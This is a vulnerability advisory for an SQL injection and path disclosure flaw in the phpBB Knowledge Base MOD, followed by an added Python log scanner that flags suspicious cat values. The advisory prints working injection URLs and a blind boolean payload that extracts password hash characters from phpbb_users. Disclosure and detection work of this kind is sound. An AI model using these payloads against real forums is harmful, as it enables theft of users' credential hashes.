`
###########################################################
# phpBB - Knowledge Base MOD #
# SQL-Injection vulnerability and Full Path Disclosure #
# #
# Discovered by [R] and deluxe89 #
###########################################################
Discussion:
The phpBB Knowledge Base MOD has a relatively hard-to-exploit SQL injection vulnerability. However, an attacker can exploit this bug to retrieve information from the database.
The Bug:
The script doesn't filter the cat variable.
If we supply a malformed value here:
/kb.php?mode=cat&cat='
We will get an error similar to this:
Could not obtain category data
DEBUG MODE
SQL Error : 1064 You have an error in your SQL syntax
SELECT * FROM phpbb_kb_categories WHERE category_id = \'
Line : 131
File : /here/is/the/full/path/functions_kb.php
/kb.php?mode=cat&cat=0+UNION+SELECT+0,0,0,0,0,0+FROM+phpbb_users+WHERE+1=0
No match: Categorie doesn't exist.
/kb.php?mode=cat&cat=0+UNION+SELECT+0,0,0,0,0,0+FROM+phpbb_users
Match: DEBUG MODE - SQL-Error
Therefore, the only thing an attacker can find out is whether a row is matched or not.
Exploit:
The attacker may compare the information in the database with test values. Example:
0+UNION+SELECT+0,0,0,0,0,0+FROM+phpbb_users+WHERE+user_id=2+AND+ascii(substring(user_password,1,1))=97
If it returns an SQL-Error, the first character of the hash is an 'a'.
Exploit available at the websites below.
Patch:
No patch is available yet.
Greetz to madinfect, reddi, darkkilla, EaTh, Astovidatu and Doc
www.security-project.org
www.batznet.com
`
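Since the advisory lists no patch, one way to spot probing of the unfiltered cat parameter is to review web server access logs. The following is an added example, not part of the original advisory or the MOD's code: it flags kb.php requests whose cat value is not a plain integer. The combined-style log format, the sample log lines, and the assumption that legitimate category ids are always non-negative integers are all assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request portion of an access log entry, e.g. "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_cat(log_line):
    """Return the decoded cat value if the line is a kb.php request whose
    cat parameter is not a plain non-negative integer, otherwise None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/kb.php"):
        return None
    # parse_qs decodes %xx escapes and '+', so encoded values are normalised
    params = parse_qs(url.query, keep_blank_values=True)
    for value in params.get("cat", []):
        # Assumption: a legitimate category id consists of ASCII digits only
        if not re.fullmatch(r"[0-9]+", value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_cat_value) for every flagged line."""
    return [(n, v) for n, line in enumerate(lines, 1)
            if (v := suspicious_cat(line)) is not None]

# Constructed sample log lines (documentation-range addresses, made-up times);
# the request strings reuse the ones quoted in the advisory.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2000:10:00:00 +0000] '
    '"GET /kb.php?mode=cat&cat=3 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2000:10:00:05 +0000] '
    '"GET /kb.php?mode=cat&cat=%27 HTTP/1.1" 200 812',
    '192.0.2.44 - - [01/Jan/2000:10:00:09 +0000] '
    '"GET /kb.php?mode=cat&cat=0+UNION+SELECT+0,0,0,0,0,0'
    '+FROM+phpbb_users+WHERE+1=0 HTTP/1.1" 200 1490',
    '192.0.2.10 - - [01/Jan/2000:10:01:00 +0000] '
    '"GET /viewtopic.php?t=12 HTTP/1.1" 200 9000',
    '192.0.2.77 - - [01/Jan/2000:10:02:00 +0000] '
    '"GET /kb.php?mode=cat&cat= HTTP/1.1" 200 700',
]

if __name__ == "__main__":
    for lineno, value in scan(SAMPLE_LOG):
        print(f"line {lineno}: non-integer cat value {value!r}")
```

The same integer-only rule applies as a mitigation: the script should reject or cast cat before it reaches the query.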